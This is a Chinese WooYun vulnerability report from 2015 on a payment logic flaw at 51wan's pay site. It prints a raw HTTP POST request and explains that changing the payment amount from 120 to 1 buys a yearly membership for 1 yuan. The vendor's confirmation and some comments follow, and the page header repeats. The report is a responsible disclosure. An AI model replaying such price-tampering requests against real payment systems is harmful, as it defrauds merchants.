51wan某分站支付漏洞 | wooyun-2015-0103737| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0103737

漏洞标题：51wan某分站支付漏洞

漏洞作者： ssss

提交时间：2015-03-30 09:44

修复时间：2015-05-14 09:50

公开时间：2015-05-14 09:50

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-30：细节已通知厂商并且等待厂商处理中
2015-03-30：厂商已经确认，细节仅向厂商公开
2015-04-09：细节向核心白帽子及相关领域专家公开
2015-04-19：细节向普通白帽子公开
2015-04-29：细节向实习白帽子公开
2015-05-14：细节向公众公开

简要描述：

看网页游戏时，看到了，就顺手测测了，不料。。。。
51wan某分站支付漏洞

详细说明：

http://vip.51wan.com （会员中心）
进入开年费会员的页面；
然后进入支付宝网银支付；

接着；

漏洞证明：

POST /index.php?module=trade&control=confirm&xy=yearcard-19--0 HTTP/1.1
Host: pay.51wan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://pay.51wan.com/index.php?module=trade&control=index&action=trade&xy=yearcard-19---
Cookie: fromWebUrl=pay; CNZZDATA30022271=cnzz_eid%3D909180399-1427282807-http%253A%252F%252Fvip.51wan.com%252F%26ntime%3D1427281726; CNZZDATA30022279=cnzz_eid%3D542811967-1427281046-http%253A%252F%252Fvip.51wan.com%252F%26ntime%3D1427281046; PHPSESSID=615d3b6a989e7727a86491e87acad2dd; Hm_lvt_d58dd3fa9fbbc5aca88e38124a7909bc=1427284190; Hm_lpvt_d58dd3fa9fbbc5aca88e38124a7909bc=1427284190
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 129
u_check=&username=guo＊＊＊＊%40126.com&reusername=guo＊＊＊＊%40126.com&serverid=10173&payMoney=120&coid=0&money=120&defaultbank=CCB

修改此处的120 值。
为1咯

修复方案：

很严重的漏洞啊～
赶紧修复吧，求高rank，求礼物～～

版权声明：转载请注明来源 ssss@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2015-03-30 09:48

厂商回复：

多谢反馈，漏洞已修复！

漏洞评价：

2015-03-30 09:49 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

去。。。。。好快
2015-03-30 16:24 | ssss ( 实习白帽子 | Rank:80 漏洞数:19 | 虫子是给早起的勤奋的鸟儿七的。)

@咸鱼翻身其实提交了好几天了，今天才正式注册为厂商，不知道乌云怎么算时间的。
2015-03-30 16:26 | 咸鱼翻身 ( 普通白帽子 | Rank:576 漏洞数:108 )

@ssss 懂了。。。。
2015-03-30 16:46 | ssss ( 实习白帽子 | Rank:80 漏洞数:19 | 虫子是给早起的勤奋的鸟儿七的。)

@咸鱼翻身秒懂啊～棒

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0103737

漏洞标题：51wan某分站支付漏洞

相关厂商：51wan.com

漏洞作者： ssss

提交时间：2015-03-30 09:44

修复时间：2015-05-14 09:50

公开时间：2015-05-14 09:50

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ssss@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0103737

漏洞标题：51wan某分站支付漏洞

相关厂商：51wan.com

漏洞作者： ssss

提交时间：2015-03-30 09:44

修复时间：2015-05-14 09:50

公开时间：2015-05-14 09:50

漏洞类型：网络设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0103737"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 ssss@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：